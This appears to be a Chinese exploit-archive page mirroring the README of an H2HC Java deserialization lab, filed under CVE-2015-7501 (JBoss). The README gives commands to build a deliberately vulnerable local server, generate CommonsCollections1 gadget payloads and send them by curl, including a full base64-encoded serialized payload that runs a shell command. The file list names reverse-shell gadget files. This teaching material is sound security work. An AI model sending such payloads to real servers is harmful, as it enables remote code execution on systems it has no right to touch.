漏洞平台

POC详情： bf82ccd39131c0a85af297e389d92c729d113ee0

来源

https://github.com/ianxtianxt/CVE-2015-7501

关联漏洞

标题： 多款Red Hat产品代码问题漏洞 (CVE-2015-7501)
描述：Red Hat JBoss A-MQ等都是美国红帽（Red Hat）公司的产品。Red Hat JBoss A-MQ是美国红帽（Red Hat）公司的一套开源的消息传递平台。BPM Suite（BPMS）是一套集合了JBoss BRMS所有功能的业务流程管理平台。多款Red Hat产品存在安全漏洞。远程攻击者可借助特制的序列化Java对象利用该漏洞执行任意命令。以下产品和版本受到影响：Red Hat JBoss A-MQ 6.x版本；BPM Suite (BPMS) 6.x版本；BRMS 6.x版本和5

描述

（CVE-2015-7501）JBoss JMXInvokerServlet 反序列化漏洞

介绍

# Lab for Java Deserialization Vulnerabilities

This content is related to the paper written for the 12th edition of H2HC magazine. 
See full paper in: https://www.h2hc.com.br/revista/

Slides and video of the talk will be available soon.

>Um overview sobre as bases das falhas de desserialização nativa em ambientes Java (JVM)

>An overview of deserialization vulnerabilities in the Java Virtual Machine (JVM)

Content
--
The lab contains code samples that help you understand deserialization vulnerabilities and how gadget chains exploit them. 
The goal is to provide a better understanding so that you can develop new payloads and/or better design your environments.

There is also a vulnerable testing application (VulnerableHTTPServer.java), which helps you test your payloads.

Slides
--

[![Alt text](https://image.slidesharecdn.com/h2hc2017joaomatosfjavadeser-171025200215/95/an-overview-of-deserialization-vulnerabilities-in-the-java-virtual-machine-jvm-h2hc-2017-1-638.jpg?cb=1508963584)](https://www.slideshare.net/joaomatosf_/an-overview-of-deserialization-vulnerabilities-in-the-java-virtual-machine-jvm-h2hc-2017)


Examples (PoC's)
------

* PoC CVE-2017-7504 - JBossMQ JMS Invocation Layer (https://access.redhat.com/security/cve/cve-2017-7504)

[![Alt text](https://img.youtube.com/vi/jVMr4eeJ2Po/0.jpg)](https://www.youtube.com/watch?v=jVMr4eeJ2Po)

* PoC CVE-2017-12149 - JBoss 6.X and EAP 5.X (https://access.redhat.com/security/cve/cve-2017-12149)

[![Alt text](https://img.youtube.com/vi/JIWMItSA8l0/0.jpg)](https://www.youtube.com/watch?v=JIWMItSA8l0)

* PoC Exploiting struts2-rest XStream Deserialization with Reverse Shell

[![Alt text](https://img.youtube.com/vi/IrZOlqio0nw/0.jpg)](https://www.youtube.com/watch?v=IrZOlqio0nw)


Lab Usage Examples
--
First of all you need to read the full paper. Then review the sample codes and use the vulnerable testing application to understand how payloads work.

***Getting JDK***

If you dont want to go to the Oracle page and register, you can download the JDK directly from me in: http://www.joaomatosf.com/rnp/?prefix=rnp/java_files/

As **root**, run:
```
# cd /opt
# curl http://www.joaomatosf.com/rnp/java_files/jdk-8u20-linux-x64.tar.gz -o jdk-8u20-linux-x64.tar.gz 
# tar zxvf jdk-8u20-linux-x64.tar.gz
# rm -rf /usr/bin/java*
# ln -s /opt/jdk1.8.0_20/bin/j* /usr/bin
# java -version
  java version "1.8.0_20" 
```


***Getting codes:***

```
$ git clone https://github.com/joaomatosf/JavaDeserH2HC.git
$ cd JavaDeserH2HC
```

***Compiling and executing Vulnerable Web Application:***

```
$ javac VulnerableHTTPServer.java -XDignore.symbol.file
$ java -cp .:commons-collections-3.2.1.jar VulnerableHTTPServer
```


```
* =============================================================== *
*    Simple Java HTTP Server for Deserialization Lab v0.01        *
*    https://github.com/joaomatosf/JavaDeserH2HC                  *
* =============================================================== *
You can inject java serialized objects in the following formats:

 1) Binary in HTTP POST (ie \xAC\xED). Ex:
   $ curl 127.0.0.1:8000 --data-binary @ObjectFile.ser

 2) Base64 or Gzip+Base64 via HTTP POST parameters. Ex:
   $ curl 127.0.0.1:8000 -d "ViewState=H4sICAeH..."
   $ curl 127.0.0.1:8000 -d "ViewState=rO0ABXNy..."

 3) Base64 or Gzip+Base64 in cookies. Ex:
   $ curl 127.0.0.1:8000 -H "Cookie: JSESSIONID=H4sICAeH..."
   $ curl 127.0.0.1:8000 -H "Cookie: JSESSIONID=rO0ABXNy..."
   
 4) Base64 of AES-CBC encrypted with hardcoded Apache Shiro key. Ex:
   $ curl 127.0.0.1:8000 -H "Cookie: rememberMe=MTIzNDU2Nzg...
   
 5) XML for XStream RCE vulnerability/serialization. Ex:
   $ curl 127.0.0.1:8000 -d @file.xml
   
OBS: To test gadgets in specific libraries, run with -cp param. Ex:
$ java -cp .:commons-collections-3.2.1.jar VulnerableHTTPServer
==================================================================

JRE Version: 1.8.0_77
[INFO]: Listening on port 8000
```

***Testing payloads***

Compiling example1 that works in applications with commons-collections3.2.1 in the classpath and JRE < 8u72:

```
$ javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1.java
```

Generating payload:

```
$ java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1 'touch /tmp/h2hc_2017'
Saving serialized object in ExampleCommonsCollections1.ser
```

Exploiting vulnerable server:

Sending the payload in binary format via HTTP POST:
```
$ rm -rf /tmp/h2hc_2017
$ curl 127.0.0.1:8000/ --data-binary @ExampleCommonsCollections1.ser
Data deserialized!
$ ls -all /tmp/h2hc_2017
-rw-r--r-- 1 joao joao 0 Sep 13 22:34 /tmp/h2hc_2017
```

Sending the payload in Gzip+Base64 format via HTTP Cookies:
```
$ rm -rf /tmp/h2hc_2017
$ gzip ExampleCommonsCollections1.ser
$ base64 -w0 ExampleCommonsCollections1.ser.gz
$ curl 127.0.0.1:8000/ -H "cookie: JSESSIONID=H4sICMeVuVkAA0V4YW1wbGVDb21tb25zQ29sbGVjdGlvbnMxLnNlcgCVVD1MFEEUfrd3iKDEAxVNiITGqER2kZhIuEKRBCFZlCAS4hU67M3dLuzOrjOz5x0ohY0tBQmxUQut/EmMtYWxMBEl0UZDZ2HURBMtrHVmd+9uAf+44u7tzfu+933vvdn7X6GOUehhPlEpztvY4CoixOWIWy5R+6vhMCm6RhANIZKzMT334seO3cvzdxVQdNjuYGcK0wlk+5hx2KFPoyLSfG7Z2gjyMjqkeNnDHJrDAxuRgjZgI8YyJY9dBYAENMkTVUJUASlR2BP8IVOrykapWyq/P7Da8TI9sKxAQoeEyWF/jDTK1DbIlYUuwTyAcNvp0oKKPGSYWDVcx3EJE7+2BFoydpCn6mi2LHSQD4vXbpbTi0lZrD6PDO7SMofDuqDQQgototBiFNo4RYTlXeqElSn0/aNm3ieSm6kDJrIIzsUIup8vfTk4u5QShrPQZMVORKu7spuT4tMI8jcxcciTic7v747uvaEAlDwxqZQwk/lvM+KJI8JjhJPFheZ+5dFiML4Gq5LBoSU2xjNT04JLyC1SaK7twZhPuOVgqH0211u5FTOYxtRc//RzZu7KSq8CySzUWf20IHq6M7tRig7brBHMTTd3Gjl4rdqznFqkkMmKlFFEkTMudl3QtGR/s+2i/xF9aCmiX1iZvJVmh+xKlxUOjQXMI8MC1BIHhWT3Wt8+XH51vjoZ4NAgMKFKXy57u2QSLUzXoKHW29/u9M5mHp8MoMUgNbgdrQGsTcK8aih4t1hB5/5EGppYM5aAtG0daWK9+6hzD95MfPy8b+5UxUmSQ702ZRGNieutdAnqXdz1DbND446nmT2mcaGn+8gxDilcwkZVVSIoqrHKzgQvkyHETHGR6+pXnz5rvfg6CcogNNouyg0Gl3kYGrhJMTNdO1fyjp8I9V/eKr7SgZOSsNpeUxx7OY5hjomM1hiXEvp+AaGU2MlXBQAA"
Data deserialized!
$ ls -all /tmp/h2hc_2017
-rw-r--r-- 1 joao joao 0 Sep 13 22:47 /tmp/h2hc_2017
```

文件快照


 [4.0K]  /data/pocs/bf82ccd39131c0a85af297e389d92c729d113ee0
├── [1.3K]  Alien.java
├── [562K]  commons-collections-3.2.1.jar
├── [5.4K]  DnsWithCommonsCollections.java
├── [7.1K]  ExampleCommonsCollections1.java
├── [3.9K]  ExampleTransformersWithLazyMap.java
├── [3.1K]  ExploitGadgetExample1.java
├── [1.9K]  ForgottenClass.java
├── [1.1K]  LICENSE
├── [6.0K]  README.md
├── [5.5K]  ReverseShellCommonsCollectionsHashMap.java
├── [3.1K]  reverseShellMultiplatformCommonsCollections.xml
├── [5.7K]  SleepExample.java
├── [1.9K]  SomeInvocationHandler.java
├── [1.6K]  TestDeserialize.java
├── [1.4K]  TestSerialize.java
├── [ 18K]  VulnerableHTTPServer.java
└── [502K]  xstream-1.4.6.jar

0 directories, 17 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。